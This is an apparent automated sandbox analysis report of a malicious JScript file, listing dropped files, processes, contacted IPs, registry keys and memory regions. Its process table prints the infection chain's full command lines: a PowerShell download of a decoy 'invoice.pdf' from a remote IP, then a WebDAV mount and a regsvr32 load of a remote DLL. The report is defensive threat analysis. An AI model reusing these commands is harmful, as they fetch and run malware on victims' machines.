Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
27328249893052310101.js
|
ASCII text, with very long lines (37093), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\invoice.pdf
|
PDF document, version 1.7
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x71772b00, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fcf3c1a8-c6f6-4eda-b755-2c2c4166db6f.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7684
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7684
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 19
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI5b5d7.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vvfq4na.1tb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zqq3dud.eqx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-16 03-17-04-617.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\3bdc3946-a70f-4c4f-be6f-557d8ff99268.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\95eec831-c837-4d44-b2b8-cc8fbc0779c9.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\e60047b2-b6a6-48ba-afbf-01767a14c2be.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\f55f80ba-8401-4029-b3f2-6a64ebc54630.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 30 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\27328249893052310101.js"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf
http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd
/c regsvr32 /s \\193.143.1.205@8888\davwwwroot\17831253157594.dll
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c net use \\193.143.1.205@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\net.exe
|
net use \\193.143.1.205@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2108 --field-trial-handle=1632,i,4704499646644094334,4201205311762563793,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.205:8888/Ya
|
unknown
|
|
|
|
http://193.143.1.205:8888/log5
|
unknown
|
|
|
|
http://193.143.1.205/invoice.php
|
193.143.1.205
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://193.143.1.205:8888/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
e8652.dscx.akamaiedge.net
|
23.209.209.135
|
||
|
x1.i.lencr.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.143.1.205
|
unknown
|
unknown
|
|
|
|
23.209.209.135
|
e8652.dscx.akamaiedge.net
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
19B4D412000
|
heap
|
page read and write
|
||
|
19B4D330000
|
heap
|
page read and write
|
||
|
19B4D4BA000
|
heap
|
page read and write
|
||
|
1C54A620000
|
remote allocation
|
page read and write
|
||
|
1C54A4CA000
|
heap
|
page read and write
|
||
|
1C54A360000
|
trusted library allocation
|
page read and write
|
||
|
1C54A4FD000
|
heap
|
page read and write
|
||
|
927D57E000
|
stack
|
page read and write
|
||
|
266C6635000
|
heap
|
page read and write
|
||
|
E69AF7C000
|
stack
|
page read and write
|
||
|
1C545702000
|
heap
|
page read and write
|
||
|
19B4D4E6000
|
heap
|
page read and write
|
||
|
19B4F197000
|
heap
|
page read and write
|
||
|
19B4D4BA000
|
heap
|
page read and write
|
||
|
1C545D80000
|
trusted library allocation
|
page read and write
|
||
|
927D0FE000
|
unkown
|
page readonly
|
||
|
19B4F16C000
|
heap
|
page read and write
|
||
|
19B4F16D000
|
heap
|
page read and write
|
||
|
927D37E000
|
stack
|
page read and write
|
||
|
1C544E94000
|
heap
|
page read and write
|
||
|
19B4F1D3000
|
heap
|
page read and write
|
||
|
19B4F1D6000
|
heap
|
page read and write
|
||
|
927DBFB000
|
stack
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F16F000
|
heap
|
page read and write
|
||
|
1C544DA0000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4D4A6000
|
heap
|
page read and write
|
||
|
19B4EE10000
|
heap
|
page read and write
|
||
|
1C544EFF000
|
heap
|
page read and write
|
||
|
19B4D39A000
|
heap
|
page read and write
|
||
|
927DAFE000
|
unkown
|
page readonly
|
||
|
1C544E7C000
|
heap
|
page read and write
|
||
|
1C54A3D0000
|
trusted library allocation
|
page read and write
|
||
|
266C63D3000
|
heap
|
page read and write
|
||
|
19B4D48E000
|
heap
|
page read and write
|
||
|
56E4CFE000
|
stack
|
page read and write
|
||
|
19B4F1A7000
|
heap
|
page read and write
|
||
|
266C6378000
|
heap
|
page read and write
|
||
|
1C54B000000
|
heap
|
page read and write
|
||
|
1C546200000
|
trusted library allocation
|
page read and write
|
||
|
19B4F16E000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C54A3C0000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1DE000
|
heap
|
page read and write
|
||
|
19B4F199000
|
heap
|
page read and write
|
||
|
19B4F16E000
|
heap
|
page read and write
|
||
|
1C544CC0000
|
heap
|
page read and write
|
||
|
266C63CD000
|
heap
|
page read and write
|
||
|
266C6370000
|
heap
|
page read and write
|
||
|
19B4F17B000
|
heap
|
page read and write
|
||
|
1C54A44F000
|
heap
|
page read and write
|
||
|
1C545E70000
|
trusted library section
|
page readonly
|
||
|
927D17E000
|
stack
|
page read and write
|
||
|
19B4F163000
|
heap
|
page read and write
|
||
|
19B4F1EC000
|
heap
|
page read and write
|
||
|
1C544F13000
|
heap
|
page read and write
|
||
|
1C5455F0000
|
trusted library allocation
|
page read and write
|
||
|
1C545615000
|
heap
|
page read and write
|
||
|
927C9FE000
|
unkown
|
page readonly
|
||
|
19B4F197000
|
heap
|
page read and write
|
||
|
1C54A3E0000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C54A4F7000
|
heap
|
page read and write
|
||
|
19B4F16F000
|
heap
|
page read and write
|
||
|
1C54A280000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1A7000
|
heap
|
page read and write
|
||
|
19B4F1EC000
|
heap
|
page read and write
|
||
|
1C54A270000
|
trusted library allocation
|
page read and write
|
||
|
1C54A260000
|
trusted library allocation
|
page read and write
|
||
|
E69AEFF000
|
stack
|
page read and write
|
||
|
19B4F1D2000
|
heap
|
page read and write
|
||
|
19B4F16B000
|
heap
|
page read and write
|
||
|
927D27E000
|
stack
|
page read and write
|
||
|
19B4F1EC000
|
heap
|
page read and write
|
||
|
56E51FE000
|
stack
|
page read and write
|
||
|
19B4D442000
|
heap
|
page read and write
|
||
|
1C5455C1000
|
trusted library allocation
|
page read and write
|
||
|
1C544E5C000
|
heap
|
page read and write
|
||
|
19B4F167000
|
heap
|
page read and write
|
||
|
19B4F1D5000
|
heap
|
page read and write
|
||
|
19B4D408000
|
heap
|
page read and write
|
||
|
1C54A4EB000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C545600000
|
heap
|
page read and write
|
||
|
19B4F187000
|
heap
|
page read and write
|
||
|
1C544E8D000
|
heap
|
page read and write
|
||
|
19B4F1A7000
|
heap
|
page read and write
|
||
|
1C544DD0000
|
trusted library allocation
|
page read and write
|
||
|
1C544E8F000
|
heap
|
page read and write
|
||
|
19B4F197000
|
heap
|
page read and write
|
||
|
1C54A490000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
56E50FF000
|
stack
|
page read and write
|
||
|
19B4F163000
|
heap
|
page read and write
|
||
|
927D1FE000
|
unkown
|
page readonly
|
||
|
19B4F16B000
|
heap
|
page read and write
|
||
|
1C54A620000
|
remote allocation
|
page read and write
|
||
|
1C54A2F0000
|
trusted library allocation
|
page read and write
|
||
|
266C6290000
|
heap
|
page read and write
|
||
|
1C54A455000
|
heap
|
page read and write
|
||
|
19B4F172000
|
heap
|
page read and write
|
||
|
266C63AB000
|
heap
|
page read and write
|
||
|
266C62E0000
|
remote allocation
|
page read and write
|
||
|
19B4F169000
|
heap
|
page read and write
|
||
|
19B4D49E000
|
heap
|
page read and write
|
||
|
1C54A442000
|
heap
|
page read and write
|
||
|
19B4F16B000
|
heap
|
page read and write
|
||
|
19B4F190000
|
heap
|
page read and write
|
||
|
19B4F1B0000
|
heap
|
page read and write
|
||
|
56E4BFE000
|
stack
|
page read and write
|
||
|
19B4D39E000
|
heap
|
page read and write
|
||
|
19B4F197000
|
heap
|
page read and write
|
||
|
56E4FFE000
|
stack
|
page read and write
|
||
|
1C544E13000
|
heap
|
page read and write
|
||
|
19B4F16C000
|
heap
|
page read and write
|
||
|
1C545E60000
|
trusted library section
|
page readonly
|
||
|
56E54FB000
|
stack
|
page read and write
|
||
|
19B4F177000
|
heap
|
page read and write
|
||
|
1C545713000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C54A2B0000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1AF000
|
heap
|
page read and write
|
||
|
19B4D49D000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F199000
|
heap
|
page read and write
|
||
|
19B4F1A7000
|
heap
|
page read and write
|
||
|
E69AB8A000
|
stack
|
page read and write
|
||
|
1C54A400000
|
heap
|
page read and write
|
||
|
1C54A3D0000
|
trusted library allocation
|
page read and write
|
||
|
927CAFC000
|
stack
|
page read and write
|
||
|
1C544F02000
|
heap
|
page read and write
|
||
|
1C54A2C4000
|
trusted library allocation
|
page read and write
|
||
|
1C544E72000
|
heap
|
page read and write
|
||
|
927CEFB000
|
stack
|
page read and write
|
||
|
1C54A2F3000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1EC000
|
heap
|
page read and write
|
||
|
927C27C000
|
stack
|
page read and write
|
||
|
19B4F173000
|
heap
|
page read and write
|
||
|
19B4D430000
|
heap
|
page read and write
|
||
|
266C62E0000
|
remote allocation
|
page read and write
|
||
|
927E27E000
|
stack
|
page read and write
|
||
|
19B4D399000
|
heap
|
page read and write
|
||
|
266C63AB000
|
heap
|
page read and write
|
||
|
1C54A50C000
|
heap
|
page read and write
|
||
|
1C54A420000
|
heap
|
page read and write
|
||
|
19B4F184000
|
heap
|
page read and write
|
||
|
1C54A462000
|
heap
|
page read and write
|
||
|
19B4F17A000
|
heap
|
page read and write
|
||
|
927DCFE000
|
unkown
|
page readonly
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C545602000
|
heap
|
page read and write
|
||
|
1C54A280000
|
trusted library allocation
|
page read and write
|
||
|
19B4F177000
|
heap
|
page read and write
|
||
|
1C54A200000
|
trusted library allocation
|
page read and write
|
||
|
927D87E000
|
stack
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C54A350000
|
trusted library allocation
|
page read and write
|
||
|
1C545E90000
|
trusted library section
|
page readonly
|
||
|
19B4F199000
|
heap
|
page read and write
|
||
|
1C54A45B000
|
heap
|
page read and write
|
||
|
927CBFE000
|
unkown
|
page readonly
|
||
|
1C54A281000
|
trusted library allocation
|
page read and write
|
||
|
1C54A2B0000
|
trusted library allocation
|
page read and write
|
||
|
927D5FE000
|
unkown
|
page readonly
|
||
|
19B4F16C000
|
heap
|
page read and write
|
||
|
19B4F199000
|
heap
|
page read and write
|
||
|
19B4F1D5000
|
heap
|
page read and write
|
||
|
19B4F170000
|
heap
|
page read and write
|
||
|
927CCFB000
|
stack
|
page read and write
|
||
|
19B4F1DB000
|
heap
|
page read and write
|
||
|
19B4D39D000
|
heap
|
page read and write
|
||
|
56E52FD000
|
stack
|
page read and write
|
||
|
1C54A2A0000
|
trusted library allocation
|
page read and write
|
||
|
927D6F9000
|
stack
|
page read and write
|
||
|
1C54A505000
|
heap
|
page read and write
|
||
|
19B4F162000
|
heap
|
page read and write
|
||
|
56E4758000
|
stack
|
page read and write
|
||
|
1C54A3B0000
|
trusted library allocation
|
page read and write
|
||
|
19B4F1EC000
|
heap
|
page read and write
|
||
|
266C6270000
|
heap
|
page read and write
|
||
|
19B4F1D5000
|
heap
|
page read and write
|
||
|
19B4F19F000
|
heap
|
page read and write
|
||
|
19B4F1AF000
|
heap
|
page read and write
|
||
|
19B4D42C000
|
heap
|
page read and write
|
||
|
19B4D395000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4D350000
|
heap
|
page read and write
|
||
|
19B4F1A7000
|
heap
|
page read and write
|
||
|
19B4F1D5000
|
heap
|
page read and write
|
||
|
1C544EA1000
|
heap
|
page read and write
|
||
|
19B4F1D5000
|
heap
|
page read and write
|
||
|
19B4F161000
|
heap
|
page read and write
|
||
|
1C544DE0000
|
trusted library section
|
page read and write
|
||
|
1C54A50A000
|
heap
|
page read and write
|
||
|
927C6FE000
|
unkown
|
page readonly
|
||
|
1C544F29000
|
heap
|
page read and write
|
||
|
927D4FE000
|
unkown
|
page readonly
|
||
|
19B4F16C000
|
heap
|
page read and write
|
||
|
19B4D42B000
|
heap
|
page read and write
|
||
|
1C54A42D000
|
heap
|
page read and write
|
||
|
266C63A3000
|
heap
|
page read and write
|
||
|
19B4F163000
|
heap
|
page read and write
|
||
|
266C63A5000
|
heap
|
page read and write
|
||
|
1C54A502000
|
heap
|
page read and write
|
||
|
1C54A2C0000
|
trusted library allocation
|
page read and write
|
||
|
927D3FE000
|
unkown
|
page readonly
|
||
|
927D9FC000
|
stack
|
page read and write
|
||
|
1C54A45F000
|
heap
|
page read and write
|
||
|
1C544E9F000
|
heap
|
page read and write
|
||
|
1C54A350000
|
trusted library allocation
|
page read and write
|
||
|
1C544E00000
|
heap
|
page read and write
|
||
|
19B4F175000
|
heap
|
page read and write
|
||
|
1C545891000
|
trusted library allocation
|
page read and write
|
||
|
1C54A4EF000
|
heap
|
page read and write
|
||
|
1C54571A000
|
heap
|
page read and write
|
||
|
19B4D250000
|
heap
|
page read and write
|
||
|
927D8FE000
|
unkown
|
page readonly
|
||
|
266C639C000
|
heap
|
page read and write
|
||
|
1C544E2B000
|
heap
|
page read and write
|
||
|
19B4F1DB000
|
heap
|
page read and write
|
||
|
19B4F1DE000
|
heap
|
page read and write
|
||
|
1C54A48E000
|
heap
|
page read and write
|
||
|
266C62E0000
|
remote allocation
|
page read and write
|
||
|
19B4D4A4000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
1C545B40000
|
trusted library allocation
|
page read and write
|
||
|
1C54A4C0000
|
heap
|
page read and write
|
||
|
927D2FE000
|
unkown
|
page readonly
|
||
|
19B4F1A8000
|
heap
|
page read and write
|
||
|
19B4F17F000
|
heap
|
page read and write
|
||
|
1C545700000
|
heap
|
page read and write
|
||
|
1C544EBD000
|
heap
|
page read and write
|
||
|
927C8FE000
|
stack
|
page read and write
|
||
|
19B4D4BA000
|
heap
|
page read and write
|
||
|
19B4D390000
|
heap
|
page read and write
|
||
|
56E4EFE000
|
stack
|
page read and write
|
||
|
19B4D48E000
|
heap
|
page read and write
|
||
|
E69AE7F000
|
stack
|
page read and write
|
||
|
1C544E41000
|
heap
|
page read and write
|
||
|
927C5F7000
|
stack
|
page read and write
|
||
|
19B4F174000
|
heap
|
page read and write
|
||
|
19B4D42F000
|
heap
|
page read and write
|
||
|
19B4F173000
|
heap
|
page read and write
|
||
|
19B4F16F000
|
heap
|
page read and write
|
||
|
1C545E80000
|
trusted library section
|
page readonly
|
||
|
927CDFE000
|
unkown
|
page readonly
|
||
|
19B4D45F000
|
heap
|
page read and write
|
||
|
19B4F160000
|
heap
|
page read and write
|
||
|
927D7FE000
|
unkown
|
page readonly
|
||
|
1C54A620000
|
remote allocation
|
page read and write
|
||
|
19B4D48E000
|
heap
|
page read and write
|
||
|
19B4D453000
|
heap
|
page read and write
|
||
|
1C544CA0000
|
heap
|
page read and write
|
||
|
1C545EA0000
|
trusted library section
|
page readonly
|
||
|
1C54571A000
|
heap
|
page read and write
|
||
|
19B4F1DE000
|
heap
|
page read and write
|
||
|
266C6630000
|
heap
|
page read and write
|
||
|
1C54A2C0000
|
trusted library allocation
|
page read and write
|
||
|
927CFFE000
|
unkown
|
page readonly
|
||
|
266C63C7000
|
heap
|
page read and write
|
||
|
927D47E000
|
stack
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F16F000
|
heap
|
page read and write
|
||
|
19B4D400000
|
heap
|
page read and write
|
||
|
19B4F168000
|
heap
|
page read and write
|
||
|
19B4D470000
|
heap
|
page read and write
|
||
|
19B4F18F000
|
heap
|
page read and write
|
||
|
1C545EB0000
|
trusted library section
|
page readonly
|
||
|
E69AFFE000
|
stack
|
page read and write
|
||
|
19B4F1AF000
|
heap
|
page read and write
|
||
|
19B4D48E000
|
heap
|
page read and write
|
||
|
1C544E77000
|
heap
|
page read and write
|
||
|
927E2FE000
|
unkown
|
page readonly
|
||
|
19B4F1DE000
|
heap
|
page read and write
|
||
|
1C54A50F000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
19B4F171000
|
heap
|
page read and write
|
||
|
19B4F1B6000
|
heap
|
page read and write
|
||
|
266C6190000
|
heap
|
page read and write
|
||
|
1C54A500000
|
heap
|
page read and write
|
||
|
19B4F188000
|
heap
|
page read and write
|
||
|
927D07E000
|
stack
|
page read and write
|
||
|
19B4F1B2000
|
heap
|
page read and write
|
||
|
266C63E0000
|
heap
|
page read and write
|
||
|
56E4AFF000
|
stack
|
page read and write
|
There are 278 hidden memdumps, click here to show them.